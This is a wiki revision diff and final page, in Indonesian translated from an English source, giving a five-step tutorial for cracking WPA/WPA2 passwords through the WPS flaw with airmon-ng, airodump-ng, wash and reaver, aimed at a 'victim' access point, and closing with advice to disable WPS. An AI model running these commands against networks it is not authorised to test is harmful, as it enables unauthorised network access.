Difference between revisions of "Reaver: 5 Langkah Menjebol WPA"

From OnnoWiki
Jump to navigation Jump to search
(New page: Sumber: http://www.hacking-tutorial.com/hacking-tutorial/wifi-hacking-cracking-wpa2-password A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup (WPS), allows WPA and WPA2 s...)
 
 
(One intermediate revision by the same user not shown)
Line 2: Line 2:
  
  
A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup (WPS), allows WPA and WPA2 security to be bypassed and effectively broken in many situations. Many access point they have a Wifi Protected Setup enabled by default (even after we hard reset the access point).
+
Sebuah cacat dalam fitur ditambahkan ke WiFi, yaitu WiFi Protected Setup (WPS), memungkinkan keamanan WPA dan WPA2 bisa di lewati dan secara effektif tidak berfungsi dalam banyak situasi. Banyak Access Point memiliki WiFi Protected Setup (WPS) diaktifkan secara default (bahkan setelah hard reset Access Point).
  
 
==Kebutuhan==
 
==Kebutuhan==
Line 11: Line 11:
 
==Langkah==
 
==Langkah==
  
1. Open our terminal (CTRL+ALT+T) and type airmon-ng (view tips and tricks how to create keyboard shortcut on kali linux)
+
===Cek wireless card===
  
 
  airmon-ng
 
  airmon-ng
  
this command will lists our wireless card that attached with our system.
+
Perintah ini akan memberikan daftar wireless card yang menempel pada komputer.
  
2. The next step we need to stop our wireless monitor mode by running airmon-ng stop wlan0
+
 
 +
===Stop monitoring mode===
  
 
  airmon-ng stop wlan0
 
  airmon-ng stop wlan0
  
  
3. Now we ready to capture the wireless traffic around us. By running airodump-ng wlan0 our wireless interface will start capturing the data.
+
===Capture traffic wifi===
 +
 
  
 
  airodump-ng wlan0
 
  airodump-ng wlan0
  
From the picture above, we can see many available access point with all the information. In the green box is our victim access point which is my own access point :-)
+
Informasi yang diberikan:
 
 
Information:
 
  
BSSID (Basic Service Set Identification): the MAC address of access point
+
* BSSID (Basic Service Set Identification): the MAC address of access point
PWR: Signal level reported by the card.
+
* PWR: Signal level reported by the card.
Beacons: Number of announcements packets sent by the AP
+
* Beacons: Number of announcements packets sent by the AP
#Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
+
* #Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
#/s: Number of data packets per second measure over the last 10 seconds.
+
* #/s: Number of data packets per second measure over the last 10 seconds.
CH: Channel number (taken from beacon packets).
+
* CH: Channel number (taken from beacon packets).
MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
+
* MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
ENC: Encryption algorithm in use.
+
* ENC: Encryption algorithm in use.
CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
+
* CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
AUTH: The authentication protocol used.
+
* AUTH: The authentication protocol used.
ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.
+
* ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.
  
4. From the step 3 above, we can find access point with encryption algorithm WPA2 and note the AP channel number. Now we will find out whether target AP has WPS enabled or not.
+
===Cek WPS di enable di AP===
  
 
  wash -i wlan0 -c 8 -C -s
 
  wash -i wlan0 -c 8 -C -s
  
if the WPS Locked status is No, then we ready to crack and move to step 5.
+
Jika WPS Locked status adalah No, kita siap untuk meng-crack - lanjutkan.
  
5. The last step is cracking the WPA2 password using reaver.
+
===Crack WPA2 menggunakan reaver===
  
 
  reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360
 
  reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360
  
Because we already get the information from step 3 above, so my command look like this:
+
Untuk AP yang spesifik, misalnya
  
 
  reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360
 
  reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360
  
5 Steps Wifi Hacking - Cracking WPA2 Password
+
Akan membutuhkan 5 jam-an untuk meng-crack 19 karakter di WPA2 password.
  
it took about 5 hours to crack 19 characters WPA2 password (vishnuvalentino.com) from my Kali virtualBox, but it depend with our hardware and wireless card.
 
  
Conclusions:
 
  
* WPA and WPA2 security implemented without using the Wi-Fi Protected Setup (WPS) feature are unaffected by the security vulnerability.
+
==Kesimpulan==
* To prevent this attack, just turn off our WPS/QSS feature on our access point. See picture below (I only have the Chinese version 😛 )
 
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/wifi-hacking-cracking-wpa2-password#sthash.Jlcg5dnB.dpuf
 
  
 +
* WPA dan WPA2 security di implementasikan tanpa Wi-Fi Protected Setup (WPS) tidak akan terpengaruh oleh vulnerability ini.
 +
* Kita perlu mematikan fitur WPS/QSS di access point.
  
  

Latest revision as of 07:12, 27 April 2020

Sumber: http://www.hacking-tutorial.com/hacking-tutorial/wifi-hacking-cracking-wpa2-password


Sebuah cacat dalam fitur ditambahkan ke WiFi, yaitu WiFi Protected Setup (WPS), memungkinkan keamanan WPA dan WPA2 bisa di lewati dan secara effektif tidak berfungsi dalam banyak situasi. Banyak Access Point memiliki WiFi Protected Setup (WPS) diaktifkan secara default (bahkan setelah hard reset Access Point).

Kebutuhan

  • Wireless card (support promiscuous mode)
  • Access point with WPA2 and WPS enables

Langkah

Cek wireless card

airmon-ng

Perintah ini akan memberikan daftar wireless card yang menempel pada komputer.


Stop monitoring mode

airmon-ng stop wlan0


Capture traffic wifi

airodump-ng wlan0

Informasi yang diberikan:

  • BSSID (Basic Service Set Identification): the MAC address of access point
  • PWR: Signal level reported by the card.
  • Beacons: Number of announcements packets sent by the AP
  • #Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
  • #/s: Number of data packets per second measure over the last 10 seconds.
  • CH: Channel number (taken from beacon packets).
  • MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
  • ENC: Encryption algorithm in use.
  • CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
  • AUTH: The authentication protocol used.
  • ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.

Cek WPS di enable di AP

wash -i wlan0 -c 8 -C -s

Jika WPS Locked status adalah No, kita siap untuk meng-crack - lanjutkan.

Crack WPA2 menggunakan reaver

reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360

Untuk AP yang spesifik, misalnya

reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360

Akan membutuhkan 5 jam-an untuk meng-crack 19 karakter di WPA2 password.


Kesimpulan

  • WPA dan WPA2 security di implementasikan tanpa Wi-Fi Protected Setup (WPS) tidak akan terpengaruh oleh vulnerability ini.
  • Kita perlu mematikan fitur WPS/QSS di access point.



Referensi